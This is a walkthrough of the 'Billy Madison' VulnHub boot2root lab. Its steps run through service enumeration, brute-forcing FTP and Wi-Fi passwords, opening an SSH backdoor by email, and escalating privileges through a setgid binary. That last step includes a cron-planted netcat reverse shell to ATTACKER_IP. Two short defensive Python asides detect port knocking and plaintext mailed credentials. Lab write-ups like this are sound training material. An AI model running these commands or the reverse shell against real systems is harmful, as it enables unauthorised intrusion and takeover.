[VULNHUB] Billy Madison: 1.1

Billy Madison is a boot2root VM inspired by the film of the same name. Our goal is to root the machine and decrypt Billy’s 12th grade final project. Let’s start!

PART ONE

Start with an nmap scan:

nmap 192.168.1.17 -sV

The output:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-14 17:38 CEST
Nmap scan report for 192.168.1.17
Host is up (0.00045s latency).
Not shown: 994 filtered ports
PORT     STATE  SERVICE     VERSION
22/tcp   open   tcpwrapped
23/tcp   closed telnet
80/tcp   open   http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2525/tcp open   smtp

First of all I tried to browse to the HTTP website, but there was nothing interesting, so I tried to connect to SSH:

ssh 192.168.1.17

But I got an error:

ssh_exchange_identification: Connection closed by remote host

Mmmmh, there are 2 services left to analyze, telnet and SMB. I chose the second one because the telnet port was closed:

smbclient -L 192.168.1.17

When it prompted for a password I entered a random one, and got an interesting output:

WARNING: The "syslog" option is deprecated
Enter cristiano's password: 
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Sharename       Type      Comment
    ---------       ----      -------
    EricsSecretStuff Disk      
    IPC$            IPC       IPC Service (BM)
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

    Server               Comment
    ---------            -------
    BM                   BM

    Workgroup            Master
    ---------            -------
    WORKGROUP            

There is a share (EricsSecretStuff) and I can try to open it:

smbclient \\\\192.168.1.17\\EricsSecretStuff

Now I got an SMB shell and, listing files, I found ebd.txt. Open it with gedit:

gedit smb://192.168.1.17/EricsSecretStuff/ebd.txt

Again, enter a random password when prompted. The content of the file is:

Erics backdoor is currently CLOSED

So I discovered that there is an SSH backdoor in the system, but at the moment it is closed. I finished analyzing the SMB service, now I can switch to telnet:

telnet 192.168.1.17

This is the output:

Trying 192.168.1.17...
Connected to 192.168.1.17.
Escape character is '^]'.


***** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****

Connection closed by foreign host.

Paying attention to the message I noticed the upper-case string ROT near rkfpuzrahngvat, a hint at the rotation ciphers (the Caesar cipher is the classic example). I tried the weakest one, ROT13 (Google it if you want to know why), because “I don’t use ROTten passwords”. So I pasted rkfpuzrahngvat into a ROT13 decoder and the decrypted string is:

exschmenuating

What can I do with that string? After some minutes I tried to browse to http://192.168.1.17/exschmenuating and a new page appeared. The interesting part is:

OMg LOL LOL LOL!!! What a twit - I can't believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks! Anyway, malware installation successful. I'm now in complete control of Bill's machine! 

Now I know that there is a .cap file in this folder whose name contains “veronica”, and that she uses her name as part of her password. A hint for brute forcing the file name is “she rocks!”, which reminded me of the rockyou.txt wordlist. So I created a new wordlist from rockyou.txt with only the passwords that contain “veronica”:

cat rockyou.txt | grep veronica > veronica.txt

Now I used Burp Suite Intruder to brute-force the filename with the following payload:

GET /exschmenuating/§var§.cap HTTP/1.1
Host: 192.168.1.17
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: max-age=0

I loaded the veronica.txt dictionary and after some seconds I got the filename: 012987veronica.cap. I downloaded it and opened it with Wireshark. Analyzing it I discovered that it was a mail conversation between Veronica and Eric. The first mail is:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:56:50 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: VIRUS ALERT!
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/

Hey Veronica, 

Eric Gordon here.  

I know you use Billy's machine more than he does, so I wanted to let you know that the company is rolling out a new antivirus program for all work-from-home users.  Just click here to install it, k?  

Thanks. -Eric


.
QUIT

The second one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:00 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:00 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE: VIRUS ALERT!

Eric,

Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP? We keep FTP turned off unless someone connects with the "Spanish Armada" combo.

-VV

.
QUIT

The third one:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[2]: VIRUS ALERT!

Veronica,

Thanks that will be perfect. Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."

-Eric

.
QUIT

The fourth one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:21 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:21 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[3]: VIRUS ALERT!

Eric,

Done.

-V

.
QUIT

The fifth one:

EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Date: Sat, 20 Aug 2016 21:57:31 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:31 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[4]: VIRUS ALERT!

Veronica,

Great, the file is uploaded to the FTP server, please go to a terminal and run the file with your account - the install will be automatic and you won't get any pop-ups or anything like that.  Thanks!

-Eric


.
QUIT

The sixth one:

EHLO kali
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Date: Sat, 20 Aug 2016 21:57:41 -0500
To: eric@madisonhotels.com
From: vvaughn@polyfector.edu
Subject: test Sat, 20 Aug 2016 21:57:41 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
RE[5]: VIRUS ALERT!

Eric,

I clicked the link and now this computer is acting really weird.  The antivirus program is popping up alerts, my mouse started to move on its own, my background changed color and other weird stuff.  I'm going to send this email to you and then shut the computer down.  I have some important files I'm worried about, and Billy's working on his big 12th grade final.  I don't want anything to happen to that!

-V


.
QUIT

That’s all, and it’s clear that Veronica ran the virus that Eric uploaded to the FTP server. I found some interesting information in these mails. First, I need to port knock a set of ports to open the FTP one, and Eric’s account credentials are eric:ericdoesntdrinkhisownpee. So I opened the YouTube video linked in the second mail, wrote down the “Spanish Armada” combo, and then ran this command:

for x in 1466 67 1469 1514 1981 1986; do nmap -Pn --host-timeout 201 --max-retries 0 -T5 -p $x 192.168.1.17; done;
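The defender’s side of the same trick, as an added example that is not part of the original write-up: a host that opens a port only after a knock sequence also leaves that sequence in its firewall logs, so it can be alerted on. The log lines below are constructed in netfilter LOG format (prefix KNOCK-DROP is an assumption), and the 30-second window is an assumption too.

```python
import re
from collections import defaultdict
from datetime import datetime

# The knock sequence the write-up uses to open FTP; the window is an assumption.
KNOCK_SEQUENCE = [1466, 67, 1469, 1514, 1981, 1986]
WINDOW_SECONDS = 30

# Constructed netfilter LOG lines (prefix "KNOCK-DROP"), not from the real VM:
# 192.168.1.50 completes the sequence, 192.168.1.60 only sends a first knock.
SAMPLE_LOG = """\
Sep 14 18:40:01 bm kernel: KNOCK-DROP IN=eth0 SRC=192.168.1.50 DST=192.168.1.17 PROTO=TCP DPT=1466 SYN
Sep 14 18:40:02 bm kernel: KNOCK-DROP IN=eth0 SRC=192.168.1.50 DST=192.168.1.17 PROTO=TCP DPT=67 SYN
Sep 14 18:40:02 bm kernel: KNOCK-DROP IN=eth0 SRC=192.168.1.60 DST=192.168.1.17 PROTO=TCP DPT=1466 SYN
Sep 14 18:40:03 bm kernel: KNOCK-DROP IN=eth0 SRC=192.168.1.50 DST=192.168.1.17 PROTO=TCP DPT=1469 SYN
Sep 14 18:40:03 bm kernel: KNOCK-DROP IN=eth0 SRC=192.168.1.50 DST=192.168.1.17 PROTO=TCP DPT=1514 SYN
Sep 14 18:40:04 bm kernel: KNOCK-DROP IN=eth0 SRC=192.168.1.50 DST=192.168.1.17 PROTO=TCP DPT=1981 SYN
Sep 14 18:40:04 bm kernel: KNOCK-DROP IN=eth0 SRC=192.168.1.50 DST=192.168.1.17 PROTO=TCP DPT=1986 SYN
Sep 14 18:40:09 bm kernel: KNOCK-DROP IN=eth0 SRC=192.168.1.60 DST=192.168.1.17 PROTO=TCP DPT=22 SYN
"""
LINE_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) .*SRC=(\S+) .*DPT=(\d+)")

def detect_knocks(log_text, sequence=KNOCK_SEQUENCE, window=WINDOW_SECONDS):
    """Return (src_ip, timestamp) for each source that completes the sequence in order."""
    progress = defaultdict(lambda: (0, None))   # src -> (next index, first-knock time)
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S")
        src, port = m.group(2), int(m.group(3))
        idx, start = progress[src]
        if start is not None and (ts - start).total_seconds() > window:
            idx, start = 0, None                  # too slow: the sequence expires
        if port == sequence[idx]:
            idx, start = idx + 1, start or ts
            if idx == len(sequence):
                hits.append((src, m.group(1)))    # full sequence in order: alert
                idx, start = 0, None
        elif port == sequence[0]:
            idx, start = 1, ts                    # wrong port, but a fresh first knock
        else:
            idx, start = 0, None
        progress[src] = (idx, start)
    return hits
```

Out-of-order or stale knocks reset the per-source state, so a plain port scan that happens to touch the same ports does not fire unless it hits them in exactly this order within the window.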

Now I tried to login into FTP:

ftp 192.168.1.17

A login prompt appeared and I typed Eric’s credentials; now I am logged in.
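The mails above were recovered because SMTP ran in clear text and the account was handed out in a message body. As an added example, not part of the original write-up, here is a small parser that rebuilds messages from such a captured SMTP stream and flags bodies that disclose credentials; the transcript is constructed in the shape of the page’s capture (mails two and three, shortened) and is not the real pcap contents.

```python
import re

# Constructed SMTP transcript shaped like the page's capture (client side only,
# mails two and three shortened); it is not the real pcap contents.
SAMPLE_SESSION = """\
MAIL FROM:<vvaughn@polyfector.edu>
RCPT TO:<eric@madisonhotels.com>
DATA
Subject: RE: VIRUS ALERT!

Could you just upload it directly to us via FTP?
.
QUIT
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
DATA
Subject: RE[2]: VIRUS ALERT!

Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."
.
QUIT
"""
ADDR_RE = re.compile(r"<?([^<>\s]+@[^<>\s]+)>?")
CRED_RE = re.compile(r'username of "([^"]+)" and password "([^"]+)"', re.I)

def parse_smtp_sessions(text):
    """Rebuild messages (envelope, headers, body) from a cleartext SMTP stream."""
    messages, cur, in_data = [], None, False
    for line in text.splitlines():
        if in_data and line == ".":                     # end-of-DATA marker
            hdr, _, body = "\n".join(cur.pop("data")).partition("\n\n")
            cur["headers"] = {k.strip(): v.strip() for k, v in
                              (h.split(":", 1) for h in hdr.splitlines() if ":" in h)}
            cur["body"] = body
            messages.append(cur); cur, in_data = None, False
        elif in_data:                                   # undo RFC 5321 dot-stuffing
            cur["data"].append(line[1:] if line.startswith(".") else line)
        elif line.upper().startswith("MAIL FROM:"):
            cur = {"from": ADDR_RE.search(line).group(1), "to": [], "data": []}
        elif line.upper().startswith("RCPT TO:") and cur:
            cur["to"].append(ADDR_RE.search(line).group(1))
        elif line.upper() == "DATA" and cur:
            in_data = True
    return messages

def find_plaintext_credentials(messages):
    """Return (sender, recipients, user, password) for bodies that hand out an account."""
    return [(m["from"], m["to"], c.group(1), c.group(2))
            for m in messages for c in [CRED_RE.search(m["body"])] if c]
```

Run over a real capture the same logic is a cheap DLP check for credentials sent by mail; the only fix for the underlying exposure is TLS on the submission path and not sharing passwords in mail at all.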

PART TWO

Listing files I found a .notes file and other random things. So I downloaded the file:

get .notes

Now open it; this is the content:

Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(. 
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it) 
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.

-EG

I discovered that to activate the SSH backdoor I need to send an email with a specific content, but I also need the password, which is in Veronica’s FTP folder. First of all, open the YouTube video and complete the sentence: My kid will be a soccer player. Now I can brute force Veronica’s FTP credentials:

medusa -h 192.168.1.17 -u veronica -P veronica.txt -M ftp

After a minute I got the credentials:

ACCOUNT FOUND: [ftp] Host: 192.168.1.17 User: veronica Password: babygirl_veronica07@yahoo.com [SUCCESS]

Now I can log in to Veronica’s account. I found two files: the first one is a .cap file and the second one is an email. Download them, but remember to activate binary mode first:

binary
get eg-01.cap
get email-from-billy.eml

This is the email content:

        Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)

Kisses,

Billy

Then I opened the .cap file and noticed that it was a capture of Eric’s Wi-Fi handshake. So I launched the command:

aircrack-ng -w rockyou.txt eg-01.cap

After some minutes I cracked the Wi-Fi password: triscuit*. Now I have the SSH credentials, but I still need to activate the backdoor by sending an email. If you remember the first nmap scan, there is an SMTP service running on port 2525, so I can telnet to it and send the email from there:

telnet 192.168.1.17 2525

Now I am connected to the SMTP service and I can send the email. I use the Veronica and Eric addresses found in the first .cap file:

EHLO kali
MAIL FROM:eric@madisonhotels.com
RCPT TO:vvaughn@polyfector.edu
DATA
My kid will be a soccer player
.
QUIT

Now I performed another nmap scan to see which port I had opened:

nmap 192.168.1.17

And I discovered that the backdoor was on port 1974:

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-14 18:57 CEST
Nmap scan report for 192.168.1.17
Host is up (0.00037s latency).
Not shown: 993 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
23/tcp   closed telnet
80/tcp   open   http
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
1974/tcp open   drp
2525/tcp open   ms-v-worlds
MAC Address: 00:0C:29:A0:57:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 4.81 seconds

So I connected to the SSH backdoor with eric:triscuit*:

ssh eric@192.168.1.17 -p 1974

Now I am logged in.

PART THREE

If you want to know why the backdoor port was 1974, just:

cat why-1974.txt

Now I need to become root and decrypt the file, so I need some privilege escalation technique. I started by looking for setgid files:

find / -perm -2000 -type f 2>/dev/null

I noticed /usr/local/share/sgml/donpcgd, which is a very uncommon file. I tried to google it without success. Then I remembered Eric’s note, which said:

"To make matters worse, my privesc exploits aren't working. One sort of worked, but I think I have it installed all backwards."

The word backwards was the hint, so I googled “dgcpnod” and I found this page: https://blogs.akamai.com/2016/01/delegate-v9913-setuid-binary-vulnerability.html. There is a PoC of the exploit, so I followed it with some modifications:

cd /usr/local/share/sgml
touch /tmp/rootme
chmod 755 /tmp/rootme
./donpcgd /tmp/rootme /etc/cron.hourly/rootme
echo '#!/bin/bash' > /etc/cron.hourly/rootme
echo 'mknod /tmp/backpipe p; /bin/bash 0</tmp/backpipe | nc ATTACKER_IP 1234 1>/tmp/backpipe' >> /etc/cron.hourly/rootme

(The shell redirections in the last line were lost in the HTML rendering of the original post and are restored here; ATTACKER_IP is a placeholder for the address of the machine where the listener runs.)

It’s time to listen for a shell locally:

nc -lvp 1234

Now wait up to one hour for cron.hourly to run and you will get a shell as root on the listener. Use Python to get a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I noticed the folder /PRIVATE so I browsed into it and I found two files: BowelMovement and hint.txt. This is the content of the .txt file:

Heh, I called the file BowelMovement because it has the same initials as Billy Madison. That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

Now I copied the BowelMovement file to /tmp and downloaded it locally with Eric’s account. It seems to be a TrueCrypt volume (“That truely cracks me up!”), so first of all I created a custom dictionary file with CeWL from the Wikipedia page in the hint:

cewl -d 0 -w wordlist.txt https://en.wikipedia.org/wiki/Billy_Madison

Now crack the volume with truecrack:

truecrack -t BowelMovement -w wordlist.txt

After some minutes I discovered the password, which is execrable. Now I need to mount the volume:

truecrypt --mount BowelMovement

Now unzip secret.zip:

unzip secret.zip

And you will find the .doc file and THE-END.txt. Open the second file and the VM is complete!
